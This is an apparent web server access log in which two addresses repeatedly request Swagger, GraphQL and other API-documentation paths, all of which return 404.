34.19.116.55 - - [29/Jul/2026:02:28:36 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:36 +0000] "GET /docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:36 +0000] "GET /docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:37 +0000] "GET /graphql HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:37 +0000] "GET /graphql/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:37 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:37 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:38 +0000] "GET /graphql/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:38 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:38 +0000] "GET /graphql HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:38 +0000] "GET /api-docs HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:38 +0000] "GET /api-docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:38 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:38 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:39 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:39 +0000] "GET /api-docs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:39 +0000] "GET /api-docs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:40 +0000] "GET /api-docs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:40 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:40 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:40 +0000] "GET /api-docs/swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:41 +0000] "GET /api-docs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:41 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:41 +0000] "GET /api-docs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:41 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:41 +0000] "GET /api/swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:41 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:41 +0000] "GET /api/swagger HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:42 +0000] "GET /api/swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:42 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:42 +0000] "GET /api/swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:42 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:42 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:42 +0000] "GET /api/swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:43 +0000] "GET /api/swagger-ui.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:43 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:43 +0000] "GET /api/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:43 +0000] "GET /api/swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:44 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:44 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:44 +0000] "GET /api/swagger.yml/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:44 +0000] "GET /api/swagger.yml HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:45 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:45 +0000] "GET /api/swagger.yml/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:45 +0000] "GET /api/swagger.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:45 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:45 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:45 +0000] "GET /api/v2/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:45 +0000] "GET /api/v2/swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:46 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:46 +0000] "GET /api/v2/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:46 +0000] "GET /api/v2/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:46 +0000] "GET /apidocs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:46 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:46 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:47 +0000] "GET /apidocs HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:47 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:47 +0000] "GET /apidocs HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:47 +0000] "GET /apidocs/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:48 +0000] "GET /apidocs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:48 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:48 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:48 +0000] "GET /apidocs/swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:49 +0000] "GET /apidocs/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:49 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:49 +0000] "GET /apidocs/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:49 +0000] "GET /rest/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:49 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:49 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:49 +0000] "GET /rest HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:50 +0000] "GET /rest/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:50 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:50 +0000] "GET /rest HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:50 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:50 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:50 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:51 +0000] "GET /swagger HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:51 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:51 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:51 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:52 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:52 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:52 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:52 +0000] "GET /swagger/ HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:53 +0000] "GET /swagger/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:53 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:53 +0000] "GET /swagger HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:53 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:53 +0000] "GET /swagger-resources/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:53 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:53 +0000] "GET /swagger-resources HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:54 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:54 +0000] "GET /swagger-resources/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:54 +0000] "GET /swagger-resources HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:54 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:54 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:54 +0000] "GET /swagger-ui/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:55 +0000] "GET /swagger-ui HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:55 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:55 +0000] "GET /swagger-ui/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:55 +0000] "GET /swagger-ui HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:56 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:56 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:56 +0000] "GET /swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:56 +0000] "GET /swagger-ui.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:57 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:57 +0000] "GET /swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:57 +0000] "GET /swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:57 +0000] "GET /swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
